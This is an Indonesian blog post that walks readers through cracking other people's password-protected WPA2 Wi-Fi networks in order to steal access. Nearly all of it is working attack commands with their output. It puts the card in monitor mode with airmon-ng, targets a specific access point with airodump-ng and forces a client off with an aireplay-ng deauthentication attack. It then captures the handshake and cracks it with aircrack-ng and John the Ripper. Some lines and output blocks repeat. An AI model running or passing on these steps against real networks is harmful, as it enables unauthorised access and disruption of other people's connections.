Pasti begitu banyak yang mendapatkan Hotspot Gratis, tapi juga ada yang menggunakan Password! Sial klo sedang mau wireless’an eh di password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
2. Anda harus mengumpulkan password worldlist, agar bisa dilihat passwordnya, silakan dicari di google.
3. Koneksi wireless / wireless card
4. WPA yang ada di laptop anda.
5. John the ripper password cracker.
6. Aircrack-ng & airodump-ng (Aircrack package dah)
Download BackTrack 5 Disini:
Biasanya tools yang dibutuhkan diatas sudah lengkap ada di BackTrack, klo bukan BT ya silakan Install
Oke mari kita lanjutkan:
1. Kita buka shell prompt di BT dan tampilkan wireless yang sedang ada di sekitar kita, berikut adalah perintahnya:
root@binushacker:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Zydas zd1211 zd1211rw – [phy1]
(monitor mode enabled on mon0)
(monitor mode enabled on mon0)
2. Khekhehehe.. Ternyata ada yang nongol, yuk mari kita jadikan target wireless tersebut:
root@binushacker:~# airodump-ng mon0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 61 0 0 11 54e WPA2 CCMP PSK Wireless
3. Wokeh, sudah tersedia, mari kita mulai mengambil / mencuri akses wireless
root@binushacker:~# airodump-ng mon0 –channel 11 –bssid 38:E7:D8:AD:B2:0E -w /tmp/wpa2
CH 11 ][ BAT: 3 hours 51 mins ][ Elapsed: 7 mins ][ 2011-09-26 21:24
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 100 4319 83 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 1 -48 0 81 Wireless
Kita tunggu user untuk melakukan autentikasi dan de-autentikasi selama beberapa waktu.
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
Sabar saja ketika menunggu ya.. Pasti ada yang login & logout kan? Nah sampai ketemu hal seperti berikut dibawah:
4. Kita mendapatkan user yang sedang logout / deautentikasi / kita buat dia deautentikasi, kita gunakan perintah berikut:
root@binushacker:~# aireplay-ng -0 1 -a 38:E7:D8:AD:B2:0E -c 00:03:6D:F4:F8:86 mon0
21:25:49 Waiting for beacon frame (BSSID: 38:E7:D8:AD:B2:0E) on channel 11
21:25:50 Sending 64 directed DeAuth. STMAC: [00:03:6D:F4:F8:86] [62|63 ACKs]
root@binushacker:~#
5. Setelah logout & user tesebut login lagi, maka kita akan mendapatkan informasi key loginnya seperti hal berikut:
CH 11 ][ BAT: 3 hours 43 mins ][ Elapsed: 1 min ][ 2011-09-26 21:27 ][ WPA handshake: 38:E7:D8:AD:B2:0E
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:E7:D8:AD:B2:0E 0 96 807 28 0 11 54e WPA2 CCMP PSK Wireless
BSSID STATION PWR Rate Lost Packets Probes
38:E7:D8:AD:B2:0E 00:03:6D:F4:F8:86 0 54 - 6 0 161
6. Nah kita dapatkan nih autentikasinya, kita mulai dengan John The Ripper, pastikan bahwa anda memiliki wordlist yang sangat banyak dan kompleks agar bisa ketemu KEY nya:
root@binushacker:~# aircrack-ng -w /pentest/passwords/john/password.lst -b 38:E7:D8:AD:B2:0E /tmp/wpa*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:00] 48 keys tested (489.60 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
root@binushacker:~#
Nah, passwordnya ketemu: W!R3L3$$PWD
7. Klo anda gak mau pake wordlist, ya biasanya menunggu agak lama, apalagi klo komputernya lemot bisa berabe. Berikut adalah cara tanpa menggunakan wordlist dengan John The Ripper:
root@binushacker:~# /pentest/passwords/john/john --stdout --incremental:all | aircrack-ng -b 38:E7:D8:AD:B2:0E -w - /tmp/wpa2*.cap
Opening /tmp/wpa2-01.cap
Opening /tmp/wpa2-02.cap
Reading packets, please wait...
Aircrack-ng 1.1 r1904
[00:00:22] 11484 keys tested (534.50 k/s)
KEY FOUND! [ W!R3L3$$PWD ]
Master Key : 02 A7 BC 5F 24 67 CA 2A B5 FC F0 01 1E D5 9B 2C
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
8B 42 A5 A8 C6 55 6B 33 4A 09 8B 07 84 D3 C0 1D
Transient Key : 3F 56 FD 2B 2F CE FA D9 55 14 84 2F 53 31 42 BF
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
8C FE 11 78 9F 51 48 33 97 62 E1 C6 D7 B1 9C 6C
6B D7 5A 1C 11 22 3F 0B 7E 1D 42 51 5E 55 F4 28
D2 3A DB 75 81 DD 4E BB 64 51 29 86 AA 55 06 7B
EAPOL HMAC : 17 6E 91 77 A2 A9 F1 C5 6F 33 02 4D 59 64 8A 9B
root@binushacker:~#
root@binushacker:~#
Nah, passwordnya ketemu juga, tapi saya harus menunggu 30 JAM: W!R3L3$$PWD
Tidak ada komentar:
Posting Komentar